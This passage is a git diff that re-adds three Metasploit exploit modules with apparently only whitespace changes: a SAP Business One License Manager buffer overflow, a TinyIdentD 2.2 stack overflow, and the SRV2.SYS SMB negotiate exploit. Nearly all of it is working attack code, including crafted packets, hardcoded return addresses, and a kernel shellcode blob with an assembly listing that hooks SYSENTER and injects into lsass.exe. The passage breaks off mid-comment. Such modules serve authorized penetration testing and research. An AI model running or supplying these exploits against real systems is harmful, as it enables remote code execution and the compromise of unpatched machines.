@@ -1,78 +1,78 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SAP Business One License Manager 2005 Buffer Overflow', - 'Description' => %q{ - This module exploits a stack overflow in the SAP Business One 2005 - License Manager 'NT Naming Service' A and B releases. By sending an - excessively long string the stack is overwritten enabling arbitrary - code execution. 
- }, - 'Author' => 'Jacopo Cervini', - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '56837' ], - [ 'BID', '35933' ], - [ 'URL', 'http://www.milw0rm.com/exploits/9319' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 400, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - # patrickw tested OK w2k3sp2 20090910 - [ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret - ], - 'Privileged' => true, - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Aug 1 2009')) - - register_options([Opt::RPORT(30000)], self.class) - - end - - def exploit - connect - - sploit = "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024) - sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024) - sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028) - sploit << make_nops(44) + payload.encoded + make_nops(384) - - print_status("Trying target #{target.name}...") - sock.put(sploit) - sleep(1) - - handler - disconnect - end - -end + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SAP Business One License Manager 2005 Buffer Overflow', + 'Description' => %q{ + This module exploits a stack overflow in the SAP Business One 2005 + License Manager 'NT Naming Service' A and B releases. By sending an + excessively long string the stack is overwritten enabling arbitrary + code execution. 
+ }, + 'Author' => 'Jacopo Cervini', + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '56837' ], + [ 'BID', '35933' ], + [ 'URL', 'http://www.milw0rm.com/exploits/9319' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + # patrickw tested OK w2k3sp2 20090910 + [ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 1 2009')) + + register_options([Opt::RPORT(30000)], self.class) + + end + + def exploit + connect + + sploit = "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024) + sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024) + sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028) + sploit << make_nops(44) + payload.encoded + make_nops(384) + + print_status("Trying target #{target.name}...") + sock.put(sploit) + sleep(1) + + handler + disconnect + end + +end diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index 854a0ab54a..f5db1f3713 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb 
@@ -1,77 +1,77 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - + include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'TinyIdentD 2.2 Stack Overflow', - 'Description' => %q{ - This module exploits a stack based buffer overflow in TinyIdentD version 2.2. - If we send a long string to the ident service we can overwrite the return - address and execute arbitrary code. Credit to Maarten Boone. - }, - 'Author' => 'Jacopo Cervini ', - 'Version' => '$Revision$', - 'References' => - [ + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TinyIdentD 2.2 Stack Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow in TinyIdentD version 2.2. + If we send a long string to the ident service we can overwrite the return + address and execute arbitrary code. Credit to Maarten Boone. 
+ }, + 'Author' => 'Jacopo Cervini ', + 'Version' => '$Revision$', + 'References' => + [ ['CVE', '2007-2711'], ['OSVDB', '36053'], - ['BID', '23981'], - ], - 'Payload' => - { - 'Space' => 400, - 'BadChars' => "\x00\x0d\x20\x0a" - }, - 'Platform' => 'win', - 'Targets' => - [ - ['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi - ['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi - - ], - - 'Privileged' => false, - 'DisclosureDate' => 'May 14 2007' - )) - - register_options([ Opt::RPORT(113) ], self.class) - end - - def exploit - connect - - pattern = "\xeb\x20"+", 28 : USERID : UNIX :"; - pattern << make_nops(0x1eb - payload.encoded.length) - pattern << payload.encoded - pattern << [ target.ret ].pack('V') - - - request = pattern + "\n" - - print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...") - - sock.put(request) - - - handler - disconnect - end - + ['BID', '23981'], + ], + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x0d\x20\x0a" + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi + ['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi + + ], + + 'Privileged' => false, + 'DisclosureDate' => 'May 14 2007' + )) + + register_options([ Opt::RPORT(113) ], self.class) + end + + def exploit + connect + + pattern = "\xeb\x20"+", 28 : USERID : UNIX :"; + pattern << make_nops(0x1eb - payload.encoded.length) + pattern << payload.encoded + pattern << [ target.ret ].pack('V') + + + request = pattern + "\n" + + print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...") + + sock.put(request) + + + handler + disconnect + end + end diff --git a/modules/exploits/windows/smb/smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/smb2_negotiate_func_index.rb index f6581d9e15..fca9d5caea 100644 --- a/modules/exploits/windows/smb/smb2_negotiate_func_index.rb 
+++ b/modules/exploits/windows/smb/smb2_negotiate_func_index.rb 
@@ -1,315 +1,315 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - - include Msf::Exploit::Remote::SMB - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', - 'Description' => %q{ - This module exploits an out of bounds function table dereference in the SMB - request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 - release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista - without SP1 does not seem affected by this flaw. 
- }, - - 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2009-3103'], - ['BID', '36299'], - ['OSVDB', '57799'], - ['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'], - ['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx'] - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Privileged' => true, - 'Payload' => - { - 'Space' => 1024, - 'StackAdjustment' => -3500, - 'DisableNops' => true, - 'EncoderType' => Msf::Encoder::Type::Raw, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows Vista SP1/SP2 and Server 2008 (x86)', - { - 'Platform' => 'win', - 'Arch' => [ ARCH_X86 ], - 'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :) - 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address). - 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer - 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0 - } - ], - ], - 'DefaultTarget' => 0 - )) - - register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class ) - end - - # Not reliable enough for automation yet - def autofilter - false - end - - # The payload works as follows: - # * Our sysenter handler and ring3 stagers are copied over to safe location. - # * The SYSENTER_EIP_MSR is patched to point to our sysenter handler. - # * The srv2.sys thread we are in is placed in a halted state. - # * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control. - # * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met. - # * If NX is enabled we patch the respective page table entry to disable it for the ring3 code. 
- # * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager. - # * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called. - def ring0_x86_payload( opts = {} ) - - # The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static). - pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00 - - # The address in kernel memory where we place our ring0 and ring3 stager (no ASLR). - kstager = opts['StagerAddressKernel'] || 0xFFDF0400 - - # The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR). - ustager = opts['StagerAddressUser'] || 0x7FFE0400 - - # Target SYSTEM process to inject ring3 payload into. - process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*') - - # A simple hash of the process name based on the first 4 wide chars. - # Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager) - checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 ) - - # The ring0 -> ring3 payload blob. Full assembly listing given below. 
- r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" + - "\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" + - "\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" + - "\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" + - "\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" + - "\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" + - "\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" + - "\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" + - "\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" + - "\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" + - "\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" + - "\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" + - "\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3" - # Patch in the required values. - r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") ) - r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") ) - r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") ) - r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") ) - r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") ) - # Return the ring0 -> ring3 payload blob with the real ring3 payload appended. - return r0 + payload.encoded - end - - def exploit - print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." 
) - connect - - # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest - # and srv2!SrvProcPartialCompleteCompoundedRequest - dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ] - - data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') - data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's - data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b) - data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 - data += [ 0x42424242 ].pack("V") * 7 # Unused - data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E) - data += [ 0x41414141 ].pack("V") * 6 # Unused - data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2 - data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode - - # We gain code execution by returning into the SMB packet, begining with its header. - # The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX" - # This will cause an access violation if executed as we can never set EBX to a valid pointer. - # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42. - # This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer. - # We patch the Signature1 value to be a jump forward into our shellcode. 
- packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct - packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE - packet['Payload']['SMB'].v['Flags1'] = 0x18 - packet['Payload']['SMB'].v['Flags2'] = 0xC853 - packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh'] - packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload. - packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ... - packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 ) - packet['Payload'].v['Payload'] = data - - packet = packet.to_s - - print_status( "Sending the exploit packet (#{packet.length} bytes)..." ) - sock.put( packet ) - - - wtime = datastore['WAIT'].to_i - print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." ) - stime = Time.now.to_i - - - poke_logins = %W{Guest Administrator} - poke_logins.each do |login| - begin - sec = connect(false) - sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1)) - rescue ::Exception => e - sec.socket.close - end - end - - while( stime + wtime > Time.now.to_i ) - select(nil, nil, nil, 0.25) - break if session_created? - end - - handler - disconnect - end - -end - -=begin -;=================================================================================== -; sf -; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape. 
-; http://www.uninformed.org/?v=3&a=4&t=sumry -;=================================================================================== -[bits 32] -[org 0] -;=================================================================================== -ring0_migrate_start: - cld - cli - jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address -ring0_migrate_patch: - pop esi ; pop off ring0_stager_start address - ; get current sysenter msr (nt!KiFastCallEntry) - push 0x176 ; SYSENTER_EIP_MSR - pop ecx - rdmsr - ; save origional sysenter msr (nt!KiFastCallEntry) - mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax - ; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code - mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ] - ; patch sysenter msr to be our stager - mov eax, edi - wrmsr - ; copy over stager to shared memory - mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) ) - rep movsb - sti ; set interrupt flag - ; Halt this thread to avoid problems. -ring0_migrate_idle: - hlt - jmp short ring0_migrate_idle -ring0_migrate_bounce: - call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack -;=================================================================================== -; This stager will now get called every time a ring3 process issues a sysenter -ring0_stager_start: - push byte 0 ; alloc a dword for the patched return address - pushfd ; save flags and registers - pushad - call ring0_stager_eip -ring0_stager_eip: - pop eax - ; patch in the real nt!KiFastCallEntry address as our return address - mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ] - mov [ esp + 36 ], ebx - ; see if we are being told to remove our sysenter hook... 
- cmp ecx, 0xDEADC0DE - jne ring0_stager_hook - push 0x176 ; SYSENTER_EIP_MSR - pop ecx - mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address - xor edx, edx - wrmsr - xor eax, eax ; clear eax (the syscall number) so we can continue - jmp short ring0_stager_finish -ring0_stager_hook: - ; get the origional r3 return address (edx is the ring3 stack pointer) - mov esi, [ edx ] - ; determine if the return is to a "ret" instruction - movzx ebx, byte [ esi ] - cmp bx, 0xC3 - ; only insert our ring3 stager hook if we are to return to a single ret (for stability). - jne short ring0_stager_finish - ; calculate our r3 address in shared memory - mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ] - lea ebx, [ ebx + ring3_start - ring0_stager_start ] - ; patch in our r3 stage as the r3 return address - mov [ edx ], ebx - ; detect if NX is present (clobbers eax,ebx,ecx,edx)... - mov eax, 0x80000001 - cpuid - and edx, 0x00100000 ; bit 20 is the NX bit - jz short ring0_stager_finish - ; modify the correct page table entry to make our ring3 stager executable - mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically). - add edx, 4 - and dword [ edx ], 0x7FFFFFFF ; clear the NX bit - ; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set). 
-ring0_stager_finish: - popad ; restore registers - popfd ; restore flags - ret ; return to real nt!KiFastCallEntry -ring0_stager_data: - dd 0xFFFFFFFF ; saved nt!KiFastCallEntry - dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400) - dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400) -;=================================================================================== -ring3_start: - pushad - push byte 0x30 - pop eax - cdq ; zero edx - mov ebx, [ fs : eax ] ; get the PEB - cmp [ ebx + 0xC ], edx - jz ring3_finish - mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS) - mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string) - add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process). - mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00' - add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s' - cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C) - jne ring3_finish ; if we are not currently in the correct process, return to real caller - call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook - call ring3_stager ; and then call the real ring3 payload - jmp ring3_finish ; should the payload return we can resume this thread correclty. -ring3_cleanup: - mov ecx, 0xDEADC0DE ; set the magic value for ecx - mov edx, esp ; save our esp in edx for sysenter - sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller). -ring3_finish: - popad - ret ; return to the origional system calls caller -;=================================================================================== -ring3_stager: - ; ...ring3 stager here... 
-;=================================================================================== -=end + + include Msf::Exploit::Remote::SMB + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', + 'Description' => %q{ + This module exploits an out of bounds function table dereference in the SMB + request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 + release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista + without SP1 does not seem affected by this flaw. + }, + + 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['CVE', '2009-3103'], + ['BID', '36299'], + ['OSVDB', '57799'], + ['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'], + ['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1024, + 'StackAdjustment' => -3500, + 'DisableNops' => true, + 'EncoderType' => Msf::Encoder::Type::Raw, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Vista SP1/SP2 and Server 2008 (x86)', + { + 'Platform' => 'win', + 'Arch' => [ ARCH_X86 ], + 'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :) + 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address). 
+ 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer + 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0 + } + ], + ], + 'DefaultTarget' => 0 + )) + + register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class ) + end + + # Not reliable enough for automation yet + def autofilter + false + end + + # The payload works as follows: + # * Our sysenter handler and ring3 stagers are copied over to safe location. + # * The SYSENTER_EIP_MSR is patched to point to our sysenter handler. + # * The srv2.sys thread we are in is placed in a halted state. + # * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control. + # * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met. + # * If NX is enabled we patch the respective page table entry to disable it for the ring3 code. + # * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager. + # * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called. + def ring0_x86_payload( opts = {} ) + + # The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static). + pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00 + + # The address in kernel memory where we place our ring0 and ring3 stager (no ASLR). + kstager = opts['StagerAddressKernel'] || 0xFFDF0400 + + # The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR). + ustager = opts['StagerAddressUser'] || 0x7FFE0400 + + # Target SYSTEM process to inject ring3 payload into. + process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*') + + # A simple hash of the process name based on the first 4 wide chars. + # Assumes process is located at '*:\windows\system32\'. 
(From Rex::Payloads::Win32::Kernel::Stager) + checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 ) + + # The ring0 -> ring3 payload blob. Full assembly listing given below. + r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" + + "\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" + + "\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" + + "\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" + + "\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" + + "\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" + + "\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" + + "\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" + + "\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" + + "\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" + + "\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" + + "\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" + + "\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3" + # Patch in the required values. + r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") ) + r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") ) + r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") ) + r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") ) + r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") ) + # Return the ring0 -> ring3 payload blob with the real ring3 payload appended. + return r0 + payload.encoded + end + + def exploit + print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." 
) + connect + + # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest + # and srv2!SrvProcPartialCompleteCompoundedRequest + dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ] + + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') + data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's + data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b) + data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 + data += [ 0x42424242 ].pack("V") * 7 # Unused + data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E) + data += [ 0x41414141 ].pack("V") * 6 # Unused + data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2 + data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode + + # We gain code execution by returning into the SMB packet, begining with its header. + # The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX" + # This will cause an access violation if executed as we can never set EBX to a valid pointer. + # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42. + # This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer. + # We patch the Signature1 value to be a jump forward into our shellcode. 
+ packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct + packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE + packet['Payload']['SMB'].v['Flags1'] = 0x18 + packet['Payload']['SMB'].v['Flags2'] = 0xC853 + packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh'] + packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload. + packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ... + packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 ) + packet['Payload'].v['Payload'] = data + + packet = packet.to_s + + print_status( "Sending the exploit packet (#{packet.length} bytes)..." ) + sock.put( packet ) + + + wtime = datastore['WAIT'].to_i + print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." ) + stime = Time.now.to_i + + + poke_logins = %W{Guest Administrator} + poke_logins.each do |login| + begin + sec = connect(false) + sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1)) + rescue ::Exception => e + sec.socket.close + end + end + + while( stime + wtime > Time.now.to_i ) + select(nil, nil, nil, 0.25) + break if session_created? + end + + handler + disconnect + end + +end + +=begin +;=================================================================================== +; sf +; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape. 
+; http://www.uninformed.org/?v=3&a=4&t=sumry +;=================================================================================== +[bits 32] +[org 0] +;=================================================================================== +ring0_migrate_start: + cld + cli + jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address +ring0_migrate_patch: + pop esi ; pop off ring0_stager_start address + ; get current sysenter msr (nt!KiFastCallEntry) + push 0x176 ; SYSENTER_EIP_MSR + pop ecx + rdmsr + ; save origional sysenter msr (nt!KiFastCallEntry) + mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax + ; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code + mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ] + ; patch sysenter msr to be our stager + mov eax, edi + wrmsr + ; copy over stager to shared memory + mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) ) + rep movsb + sti ; set interrupt flag + ; Halt this thread to avoid problems. +ring0_migrate_idle: + hlt + jmp short ring0_migrate_idle +ring0_migrate_bounce: + call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack +;=================================================================================== +; This stager will now get called every time a ring3 process issues a 